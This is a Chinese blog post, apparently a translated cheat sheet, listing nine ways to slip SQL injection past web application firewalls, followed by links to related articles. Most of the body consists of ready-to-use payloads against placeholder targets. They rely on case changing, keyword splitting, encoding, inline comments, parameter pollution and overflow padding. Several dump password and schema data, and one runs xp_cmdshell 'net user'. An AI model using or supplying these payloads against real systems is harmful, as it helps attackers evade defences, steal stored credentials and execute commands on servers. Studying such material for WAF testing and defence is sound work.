SQL注入9种绕过WAF方法
SQL注入9种绕过WAF方法
0x01前言
WAF区别于常规 防火墙 是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止来自 SQL注入、 跨站点脚本 (XSS)、 文件包含和安全配置错误。
0x02 WAF工作原理
§ 检测异常协议:拒绝不符合HTTP标准的请求
§ 增强型的输入验证:代理和服务器端验证,而不仅仅是客户端验证
§ 白名单和黑名单
§ 基于规则和异常的保护:基于规则的更多是基于黑色的机制和更灵活的异常
§ 状态管理:防御会话保护(Cookie保护,反入侵规避技术,响应监控和信息披露保护)。
0x03 绕过WAF
1.混合的CaseChange恶意输入会触发WAF保护,如果WAF使用区分大小写的黑名单,则更改大小写可能会绕过该过滤器。
http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4
2.替换关键字(插入将被WAF删除的特殊字符)---SELECT可能变为SEL <ECT,一旦删除特殊字符,它将用SELECT执行
http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4
3.编码
page.php?id=1%252f%252a*/UNION%252f%252a
/SELECT
十六进制编码:
target.com/index.php?page_id=-15
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4… SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
Unicode 编码:
?id=10%D6‘%20AND%201=2%23 SELECT
'Ä'='A'; #1
4.在攻击字符串中使用注释-----插入注释。例如/ *!SELECT * /可能会被WAF忽略,但传递给目标应用程序是由mysql数据库处理。
index.php?page_id=-15
%55nION/**/%53ElecT 1,2,3,4
'union%a0select pass from users#
index.php?page_id=-15
/*!UNION*/ /*!SELECT*/ 1,2,3
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…
5.等效函数和命令----由于检测到关键字,因此无法使用某些函数或命令,但在很多情况下,我们可以使用它们的等效或类似代码。
hex()、bin() ==>
ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
substr((select 'password'),1,1)
= 0x70
strcmp(left('password',1),
0x69) = 1
strcmp(left('password',1),
0x70) = 0
strcmp(left('password',1),
0x71) = -1
mid()、substr()
==> substring()
@@user ==> user()
@@datadir ==> datadir()
5.特殊符号-----特殊符号具有特殊的含义和用法
+ ` symbol: select `version()`;
+ +- :select+id-1+1.from users;
+ @:select@^1.from users;
+Mysql function() as xxx
+`、~、!、@、%、()、[]、.、-、+ 、|、%00
Example:
'se’+’lec’+’t’
%S%E%L%E%C%T 1
1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell
”net user”’)
' or --+2=- -!!!'2
id=1+(UnI)(oN)+(SeL)(EcT)
7.HTTP参数污染------提供多个parameter= value的值集来混淆绕过WAF。鉴于 http://example.com?id=1&?id=' 或'1'='1' - '在某些情况下(例如使用Apache / PHP),应用程序将仅解析最后一个(第二个) id =, WAF只解析第一个id=。这似乎是一个合理的请求,但应用程序仍然接收并处理恶意输入。今天的大多数WAF都不容易受到HTTP参数污染(HPP)的影响,但仍然值得一试。
HPP(HTTP参数解析):
/?id=1;select+1,2,3+from+users+where+id=1—
/?id=1;select+1&id=2,3+from+users+where+id=1—
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
HPP也被称为重复参数污染,最简单的是:uid = 1&uid = 2&uid
= 3,对于这种情况,不同的Web服务器处理如下:
HPF(HTTP参数分段):
此方法是HTTP分段注入,与CRLF类似(使用控制字符%0a,%0d等执行换行符)
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1
union/* and b=*/select 1,pass/* limit */from users--
HPC(HTTP参数污染):
RFC2396定义了以下字符:
Unreserved: a-z, A-Z, 0-9 and _
. ! ~ * ' ()
Reserved : ; / ? : @ &
= + $ ,
Unwise : { } | \ ^ [ ] `
不同的Web服务器处理过程在构造特殊请求时有不同的逻辑:
对于魔术字符%,Asp / Asp.net将受到影响
8.缓冲区溢出---WAF始终是应用程序,容易受到与其他应用程序相同的软件缺陷的影响。如果出现缓冲区溢漏洞可能会导致WAF崩溃,即使它不会导致代码执行也可能会导致WAF正常运行。
?id=1 and (select 1)=(Select
0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
9. IntegrationIntegration意味着使用各种 bypass技术,单一技术可能无法绕过过滤机制,但使用各种技术混合可能性会增加很多。
target.com/index.php?page_id=-15+and+(select
1)=(Select 0xAA[..(add about 1000
"A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…
id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM
/*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
参考链接:https://vulnerablelife.wordpress.com/2014/12/18/web-application-firewall-bypass-techniques/
<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">
SQL注入9种绕过WAF方法的更多相关文章
- sql注入里关键字绕过的发现
网上大量文章,甚至<黑客攻防技术实战宝典-WEB实战篇>里面都说一些关键字如 select 等绕过可以用注释符/**/. 例如: select,union.可以用 ,se/**/lect, ...
- ModSecurity SQL注入攻击 – 深度绕过技术挑战
ModSecurity是一个入侵探测与阻止的引擎,它主要是用于Web应用程序所以也可以叫做Web应用程序防火墙.它可以作为Apache Web服务器的一个模块或单独的应用程序来运行.ModSecuri ...
- sqlmap注入之tamper绕过WAF脚本列表
本文作者:i春秋作者——玫瑰 QQ2230353371转载请保留文章出处 使用方法--tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrop ...
- SQL注入原理及绕过安全狗
1.什么是SQL注入攻击 SQL注入攻击指的是通过构造特殊的输入作为参数插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 http://www.xxx.com/list. ...
- SQL注入篇——sqli-labs各关卡方法介绍
主要是记下来了每关通过可以采用的注入方式,可能部分关卡的通关方式写的不全面,欢迎指出,具体的获取数据库信息请手动操作一下. 环境初始界面如下: sql注入流程语句: order by 3--+ #判断 ...
- SQL注入篇——sqli-labs各关卡方法介绍|1-65
主要是记下来了每关通过可以采用的注入方式,可能部分关卡的通关方式写的不全面,欢迎指出,具体的获取数据库信息请手动操作一下. 环境初始界面如下: sql注入流程语句: order by 3--+ #判断 ...
- 关于SQL注入的问题以及解决方法
1.关于SQL注入 什么是SQL注入: 由于jdbc程序在执行的过程中sql语句在拼装时使用了由页面传入参数,如果用户恶意传入一些sql中的特殊关键字,会导致sql语句意义发生变化,这种攻击方式就叫做 ...
- Sql注入一种dump所有数据的方法
Select exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where t ...
- sql注入100种姿势过waf(二):过安全狗
仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql ...
随机推荐
- 类的扩展之 DataReader的扩展
看了关于DataReader的扩展,发现能节省很多代码.从数据库读取数据最原始方法就是while()然后做循环,如果数据库添加一个字段那么你所有读取数据库的方法全部添加.通过扩展这个类就摆脱了这种令人 ...
- selenium自动化之定位多个元素
前面我们讲的都是如何定位单个元素,下面讲下怎么去定位多个元素,并且输出文本. 以百度为例:获取标红的这一组元素的文本 这里我用到的是xpath来定位的://div[@id="u1" ...
- 图 -数据结构(C语言实现)
读数据结构与算法分析 坑!待填! 若干定义 一个图G = (V , E)由顶点集V和边集E组成,每条边就是一个点对 如果点对是有序的,那么就叫做有向图 边可能还具有第三种成分,权值 无向图种从每个顶点 ...
- 程序员必备神器--vps主机
今天推荐一个功能强大.居家必备的神器给刚入行或还不了解它的同学们.且不说它有什么功能,它有多好用,先说先你有没有碰到过这些问题吧. 用百度查技术问题,发现都是互相抄袭和广告,大佬都说google好,但 ...
- Python序列之字符串 (str)
作者博文地址:http://www.cnblogs.com/spiritman/ Python字符串的常用操作包括以下但不限于以下操作: 字符串的替换.删除.切片.复制.连接.比较.查找.分割等 以下 ...
- USACO 1.4.2 Mother's Mil 母亲的牛奶(DFS)
Description 农民约翰有三个容量分别是A,B,C升的桶,A,B,C分别是三个从1到20的整数,最初,A和B桶都是空的,而C桶是装满牛奶的.有时,约翰把牛奶从一个桶倒到另一个桶中,直到被灌桶装 ...
- Scrum立会报告+燃尽图(十月二十九日总第二十次)
此作业要求参见:https://edu.cnblogs.com/campus/nenu/2018fall/homework/2288 项目地址:https://git.coding.net/zhang ...
- 互评Alpha版本 - Hello World团队项目空天猎
在测评该项目时,我找到了Hello World!团队的git,并下载了相关文件以及阅读了程序运行说明. 如图所示,我下载了一个名为 SkyHunter1.0.rar 的压缩文件包,文件包内容如下: 根 ...
- Android 7.1.1 又出幺蛾子了 —— 再谈 Android 上的 Wifi 连接
在之前的博客文章中,我写了点在 Android 6 系统中连接到指定名称的 Wifi 的体验.然而,在 Android 7 中,有一些东西又变化了.另外就是在那篇文章中我说要提供代码,结果拖到这篇文章 ...
- 03 JAVA IO
java.io包中定义了多个流类型来实现输入输出功能,以不同的角度进行分类: 按数据流的方向不同可以分为输入流和输出流 按处理数据单位不通可以分为字节流和字符流 按照功能不同可以分为节点流和处理流 所 ...